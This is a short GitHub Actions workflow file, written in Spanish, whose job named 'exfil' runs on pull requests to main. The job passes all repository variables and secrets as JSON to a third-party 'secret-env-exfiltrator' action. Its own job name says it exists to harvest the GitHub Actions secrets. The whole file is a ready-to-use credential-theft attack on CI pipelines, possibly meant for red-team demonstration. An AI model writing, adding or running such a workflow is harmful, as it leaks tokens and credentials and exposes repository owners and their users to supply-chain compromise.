name: Conseguir los secretos

on:
  pull_request:
    types: [opened, synchronize]
    branches:
      - main

jobs:                                                                                                                                                            
  exfil:                                                                                                                                                         
    runs-on: ubuntu-latest                                                                                                                                       
    name: Esto conseguirá los secretos de GitHub Actions gracias a la acción de Offensive Actions                                                                                                                              
    steps:                                                                                                                                                       
      - uses: offensive-actions/secret-env-exfiltrator@main                                                                                                      
        with:                                                                                                                                                    
          vars: ${{ toJSON(vars) }}                                                                                                                              
          secrets: ${{ toJSON(secrets) }}
